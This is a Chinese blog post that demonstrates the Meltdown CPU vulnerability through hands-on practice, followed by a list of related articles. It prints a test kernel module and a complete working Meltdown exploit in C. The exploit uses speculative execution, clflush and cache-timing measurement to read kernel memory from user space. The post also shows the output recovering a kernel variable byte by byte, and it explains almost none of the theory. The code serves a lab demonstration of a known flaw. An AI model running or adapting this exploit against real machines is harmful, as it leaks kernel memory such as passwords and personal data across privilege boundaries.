宋宝华: 用代码切身实践体会meltdown漏洞

最新推荐文章于 2024-02-23 21:15:56 发布
最新推荐文章于 2024-02-23 21:15:56 发布
阅读量4.2k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jus3ve/article/details/79014939
版权

本文是我在Ubuntu 14.04上面进行的meltdown漏洞的亲测。meltdown漏洞,使得我们可以在用户空间读到内核空间的数据,做越权访问。

我感觉每天YY看技术文章,而不去亲自试验,总是无法切身体会,因此我们来把它实例化,直接写代码看效果!

本文暂时不涉及技术细节,只贴相关的代码。详细的原理,希望后面有机会再叙述。文章中涉及到的所有代码,我都放在了我的github上面:
https://github.com/21cnbao/meltdown-example.git

首先写一个内核模块,包含一个很简单的proc接口,里面有个内核全局变量variable=0x12345678,这个proc接口暴露这个全局变量。

我待会尝试用一个应用程序meltdown-baohua.c来把这个内核空间变量从用户空间偷出来。

#include <linux/module.h>

#include <linux/kernel.h>

#include <linux/init.h>

#include <linux/version.h>

#include <linux/proc_fs.h>

#include <linux/seq_file.h>

#include <asm/uaccess.h>


static unsigned int variable=0x12345678;

static struct proc_dir_entry  *test_entry;


static int test_proc_show(struct seq_file *seq, void *v)

{

unsigned int *ptr_var = seq->private;

seq_printf(seq, "%u\n", *ptr_var);

return 0;

}


static int test_proc_open(struct inode *inode, struct file *file)

{

return single_open(file, test_proc_show, PDE_DATA(inode));

}


static const struct file_operations test_proc_fops =

{

.owner = THIS_MODULE,

.open = test_proc_open,

.read = seq_read,

.llseek = seq_lseek,

.release = single_release,

};


static __init int test_proc_init(void)

{

printk("variable addr:%p\n", &variable);


test_entry = proc_create_data("stolen_data",0444, NULL, &test_proc_fops, &variable);

if (test_entry)

return 0;


return -ENOMEM;

}

module_init(test_proc_init);


static __exit void test_proc_cleanup(void)

{

remove_proc_entry("stolen_data", NULL);

}

module_exit(test_proc_cleanup);


MODULE_AUTHOR("Barry Song <baohua@kernel.org>");

MODULE_DESCRIPTION("proc exmaple");

MODULE_LICENSE("GPL v2");

这个模块对应的Makefile如下:

把它编译执行并加载:

#make

#sudo insmod proc.ko

然后dmesg看出来printk("variable addr:%p\n", &variable);这一行打印的variable地址是:

[25996.868363] variable addr:f9adf000


然后我们用下面的程序来偷取f9adf000数据:

#define _GNU_SOURCE


#include <stdio.h>

#include <string.h>

#include <signal.h>

#include <ucontext.h>

#include <unistd.h>

#include <fcntl.h>

#include <ctype.h>


#include <x86intrin.h>


//#define DEBUG 1


/* comment out if getting illegal insctructions error */

#ifndef HAVE_RDTSCP

# define HAVE_RDTSCP 1

#endif


#if !(defined(__x86_64__) || defined(__i386__))

# error "Only x86-64 and i386 are supported at the moment"

#endif



#define TARGET_OFFSET12

#define TARGET_SIZE(1 << TARGET_OFFSET)

#define BITS_READ8

#define VARIANTS_READ(1 << BITS_READ)


static char target_array[VARIANTS_READ * TARGET_SIZE];


void clflush_target(void)

{

int i;


for (i = 0; i < VARIANTS_READ; i++)

_mm_clflush(&target_array[i * TARGET_SIZE]);

}


extern char stopspeculate[];


static void __attribute__((noinline))

speculate(unsigned long addr)

{

#ifdef __x86_64__

asm volatile (

"1:\n\t"


".rept 300\n\t"

"add $0x141, %%rax\n\t"

".endr\n\t"


"movzx (%[addr]), %%eax\n\t"

"shl $12, %%rax\n\t"

"jz 1b\n\t"

"movzx (%[target], %%rax, 1), %%rbx\n"


"stopspeculate: \n\t"

"nop\n\t"

:

: [target] "r" (target_array),

  [addr] "r" (addr)

: "rax", "rbx"

);

#else /* ifdef __x86_64__ */

asm volatile (

"1:\n\t"


".rept 300\n\t"

"add $0x141, %%eax\n\t"

".endr\n\t"


"movzx (%[addr]), %%eax\n\t"

"shl $12, %%eax\n\t"

"jz 1b\n\t"

"movzx (%[target], %%eax, 1), %%ebx\n"



"stopspeculate: \n\t"

"nop\n\t"

:

: [target] "r" (target_array),

  [addr] "r" (addr)

: "rax", "rbx"

);

#endif

}


static inline int

get_access_time(volatile char *addr)

{

int time1, time2, junk;

volatile int j;


#if HAVE_RDTSCP

time1 = __rdtscp(&junk);

j = *addr;

time2 = __rdtscp(&junk);

#else

time1 = __rdtsc();

j = *addr;

_mm_mfence();

time2 = __rdtsc();

#endif


return time2 - time1;

}


static int cache_hit_threshold;

static int hist[VARIANTS_READ];

void check(void)

{

int i, time, mix_i;

volatile char *addr;


for (i = 0; i < VARIANTS_READ; i++) {

mix_i = ((i * 167) + 13) & 255;


addr = &target_array[mix_i * TARGET_SIZE];

time = get_access_time(addr);


if (time <= cache_hit_threshold)

hist[mix_i]++;

}

}


void sigsegv(int sig, siginfo_t *siginfo, void *context)

{

ucontext_t *ucontext = context;


#ifdef __x86_64__

ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;

#else

ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate;

#endif

return;

}


int set_signal(void)

{

struct sigaction act = {

.sa_sigaction = sigsegv,

.sa_flags = SA_SIGINFO,

};


return sigaction(SIGSEGV, &act, NULL);

}


#define CYCLES 1000

int readbyte(int fd, unsigned long addr)

{

int i, ret = 0, max = -1, maxi = -1;

static char buf[256];


memset(hist, 0, sizeof(hist));


for (i = 0; i < CYCLES; i++) {

ret = pread(fd, buf, sizeof(buf), 0);

if (ret < 0) {

perror("pread");

break;

}


clflush_target();


speculate(addr);

check();

}


#ifdef DEBUG

for (i = 0; i < VARIANTS_READ; i++)

if (hist[i] > 0)

printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]);

#endif


for (i = 1; i < VARIANTS_READ; i++) {

if (hist[i] && hist[i] > max) {

max = hist[i];

maxi = i;

}

}


return maxi;

}


static char *progname;

int usage(void)

{

printf("%s: [hexaddr] [size]\n", progname);

return 2;

}


static int mysqrt(long val)

{

int root = val / 2, prevroot = 0, i = 0;


while (prevroot != root && i++ < 100) {

prevroot = root;

root = (val / root + root) / 2;

}


return root;

}


#define ESTIMATE_CYCLES1000000

static void

set_cache_hit_threshold(void)

{

long cached, uncached, i;


if (0) {

cache_hit_threshold = 80;

return;

}


for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)

cached += get_access_time(target_array);


for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)

cached += get_access_time(target_array);


for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {

_mm_clflush(target_array);

uncached += get_access_time(target_array);

}


cached /= ESTIMATE_CYCLES;

uncached /= ESTIMATE_CYCLES;


cache_hit_threshold = mysqrt(cached * uncached);


printf("cached = %ld, uncached = %ld, threshold %d\n",

       cached, uncached, cache_hit_threshold);

}


static int min(int a, int b)

{

return a < b ? a : b;

}


int main(int argc, char *argv[])

{

int ret, fd, i, is_vulnerable;

unsigned long addr, size;


progname = argv[0];

if (argc < 3)

return usage();


if (sscanf(argv[1], "%lx", &addr) != 1)

return usage();


if (sscanf(argv[2], "%lx", &size) != 1)

return usage();


memset(target_array, 1, sizeof(target_array));


ret = set_signal();


set_cache_hit_threshold();


fd = open("/proc/stolen_data", O_RDONLY);

if (fd < 0) {

perror("open");

return -1;

}


for (i = 0; i < size; i++) {

ret = readbyte(fd, addr);

if (ret == -1)

ret = 0xff;

printf("read %lx = %x %c (score=%d/%d)\n",

       addr, ret, isprint(ret) ? ret : ' ',

       ret != 0xff ? hist[ret] : 0,

       CYCLES);


addr++;

}


close(fd);


return 0;

}

上述程序改编自:https://github.com/paboldin/meltdown-exploit.git

编译上述程序,并执行偷取:

baohua@baohua-VirtualBox:~/meltdown-exploit$ gcc -O2 -msse2 meltdown-baohua.c 

baohua@baohua-VirtualBox:~/meltdown-exploit$ sudo ./a.out f9adf000 4

[sudo] password for baohua: 

cached = 31, uncached = 312, threshold 98

read f9adf000 = 78 x (score=120/1000)

read f9adf001 = 56 V (score=129/1000)

read f9adf002 = 34 4 (score=218/1000)

read f9adf003 = 12   (score=178/1000)

这样我们就偷取到了f9adf000开始的4个字节,12345678了!

详细的原理,暂时没有时间讲了,读者们可以先动手做起来!


文章中涉及到的所有代码,我都放在了:
https://github.com/21cnbao/meltdown-example.git

Enjoy!

快,关注这个公众号,一起涨姿势~


Linux阅码场
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CPU漏洞分析——Meltdown与Spectre
08-10
018年1月4日,Jann Horn等安全研究者披露了"Meltdown"(CVE-2017-5754)和"Spectre"(CVE-2017-5753 & CVE-2017-5715)两组CPU特性漏洞。相关漏洞利用了芯片硬件层面执行加速机制的实现缺陷实现侧信道攻击,可以间接通过 CPU 缓存读取系统内存数据,其直接危害是将可能造成CPU运作机制上的信息泄露,低权级的攻击者可以通过漏洞来远程泄露用户信息或本地泄露更高权级的内存信息。笔者对此进行深入研究
Spectre幽灵、Meltdown熔断漏洞检测工具InSpectre Release 8
07-07
Spectre幽灵、Meltdown熔断漏洞检测工具InSpectre Release 8
CPU漏洞Meltdown
最新发布
W1Z1Q的专栏
02-23 830
本文介绍的Meltdown利用现代处理器上乱序执行(Ouf-of-order)的副作用(side effects)来读取任意的内核内存位置,包括个人数据和密码。
Meltdown攻击
01-18
Meltdown漏洞在过去24小时内肆虐了整个计算机行业,苹果也无法幸免,他们承认所有Mac和iOS设备会受个漏洞的影响。
CPU漏洞meltdown论文
08-15
CPU漏洞meltdown论文CPU漏洞meltdown论文CPU漏洞meltdown论文
Meltdown attack_Whitepaper
09-28
Whitepaper of meltdown attack. By Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, Mike Hamburg The security of computer systems fundamentally relies on memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access. In this paper, we present Meltdown. Meltdown exploits side effects of out-of-order execution on modern processors to read arbitrary kernel-memory locations including personal data and passwords.
投机之殇——一幅图读懂MELTDOWN漏洞
格友
01-08 4776
软件世界的一个基本安全原则是用户空间的代码(平民阶层,低特权)不可以访问内核空间(管理阶层,高特权),这几天进入公众视野的MELTDOWN漏洞之所以令人恐慌,就是因为它直接颠覆了这个基本原则。利用这个漏洞,黑客可以从用户空间中访问到内核空间中的信息。     下面通过一幅图来解说MELTDOWN漏洞的基本原理。下图左侧的汇编指令来自用于演示MELTDOWN漏洞的POC(proof of conce
linux 中meltdown指令,用代码切身实践体会meltdown漏洞——初学者的体验感受
weixin_42449422的博客
05-13 465
原标题:用代码切身实践体会meltdown漏洞——初学者的体验感受本文基于宋宝华老师的一篇文章——《宋宝华: 用代码切身实践体会meltdown漏洞》。作为初学者的小编,在看完这篇文章并实践之后,将自己的实践结果以及实践的感受分享给大家。小植同学对 meltdown 代码调试之后,发现执行speculate() 函数时,对汇编指令进行分析:“movzx (%[addr]), %%eaxnt”该指令...
void _mm_clflush(void const*_P)
RToax
05-07 845
/** * File: _mm_clflush.c * Author: Rong Tao <rongtao@???.cn> * Date: 2022.05.06 * * _mm_clflush() will flush cacheline if vars in cache. * * Refs: * https://www.codenong.com/52525886/ * https://zhuanlan.zhihu.com/p/242740319 */ #include.
CPU数据预取对软件性能的影响
百里杨的博客
07-31 3966
一、什么是预取 预取是指将内存中的指令和数据提前存放到cache(L1、L2、L3)中,从而加快处理器执行速度。 Cache预取可以通过硬件或者软件实现,也就是分为硬件预取和软件预取两类。 硬件预取,是通过处理器中专门的硬件来实现的,该硬件监控正在执行程序中请求的指令或数据,识别下一个程序需要的流然后预取到处理器中。 软件预取,是通过编译器分析代码然后在程序编译的过程中插入prefetch。这样在执行过程中在指定位置就会进行预取的动作。 本文讨论的预取指软件预取。 二、使用_mm_prefetch预取
clflush指令
愿世界和平的IT劝退师
04-14 1万+
CLFLUSH - 缓存线清除 操作码 指令 说明 0F AE /7 CLFLUSH m8 清除包含 m8 的缓存线。 说明 在处理器缓存层次结构(数据与指令)的所有级别中,使包含源操作数指定的线性地址的缓存线失效。失效会在整个缓存一致性域中传播。如果缓存层次结构中任何级别的缓存
宋宝华随书源代码
09-30
宋宝华随书源代码,可以配套练习,会达到更好的效果
一些不错的文档网址--笔记【原创】
热门推荐
weixin_34234823的博客
06-30 2万+
一些不错的内核文档网址 1. 轻松认识 Linux Kernel 转自:http://www.bricktou.com/default_cn.html  git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git git reset v4.0 -hard http://www.infradead...
Linux阅码场原创精华文章汇总
Linux阅码场
10-27 4700
持续更新,敬请期待!(最后更新日期2018.10.27)Linux学习方法:宋宝华: 迭代螺旋法——关于Linux学习方法的血泪建议Linux任督二脉之进程管理郭健: L...
内核跟踪调试工具--ftrace案例使用
C_JLMPC2009的博客
10-13 1180
前言 本文为原创,可能会存在一些知识点或理解上的问题,欢迎切磋和交流 ^_^ 一、简单聊聊ftrace 在定位内核问题时,往往需要深入到代码层面进行分析。在使用ftrace之前,我往往采用的是最笨的方法,即在认为可能走到的函数接口里打点,重新编包,进行替换验证,看函数是否有走到打点的流程里,通过这种添加调试日志方法进行分析函数调用关系,效率不能太低!编译一把内核包所花费的时间是是可想而知...
intel meltdown 漏洞的个人浅析
y734564892的博客
01-10 4081
操作系统为了保证了内存的独立性,会阻止应用程序去访问其他应用程序的内存空间,同样也不会让用户程序去访问内核的地址空间。这种内存独立机制保护了用户程序和内核的安全执行,也保证了多用户、多应用同时执行的安全性。 对于处理器来说,通过一个硬件上的supervisor来隔离用户态和内核态,但是在切换到内核态时,用户程序的内存映射是不会发生改变的。 一、Meltdown Meltdown能够在
X86 CPU 漏洞 Meltdown 原理及google攻击代码
chen1540524015的博客
08-25 1690
meltdown的原理其实很简单了,访问一个虚拟地址要走page table walk, 现在一般都是4级页表了,页的属性中有一位标志是区分是内核页还是用户页的。程序执行在用户模式下是不允许访问内核地址的原因就是,用户态使用用户态下的页完成虚拟地址向物理地址的转换,同理内核态使用内核态的页。那好了,meltdown发生的窗口期就是因为乱序执行,当用户态非法访问一个内核态的地址时,还没来得及做页属性...
首发:最新CPU漏洞Meltdown详细分析
奔跑吧-Linux内核
01-11 3538
2018年的第二天Meltdown和Spectre漏洞在计算机界如同放了一个核弹,IT码农们都炸开了锅,各大厂商的各路大神都在挑灯夜战的做各种测试和打补丁,各路技术爱好者也纷纷在微信群中热烈讨论漏洞的技术问题和研读论文。 本文是猫王大神(Xiao Grangrong)同学花了一个周末时间,参考了各路的论文和资料撰写出来,希望对喜欢技术的各位朋友能有一丁点的帮助,感谢猫王大神的精彩文章。
宋宝华:深入理解cache对写好代码至关重要
宋宝华
07-07 5927
There are only two hard things in Computer Science: cache invalidation and naming things.-- P...
利用工具检测Linux上是否存在Spectre& Meltdown 漏洞,知道该漏洞如何进行修复。 该两组漏洞是否还存在其他的检测方法? 如何通过微代码对该漏洞进行修复?
06-07
除了使用Spectre-meltdown-checker工具检测Linux上是否存在Spectre和Meltdown漏洞之外,还有其他一些工具可以用于检测和修复这些漏洞,如Intel-SA-00086 Detection Tool和SMIT. 修复Spectre和Meltdown漏洞的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值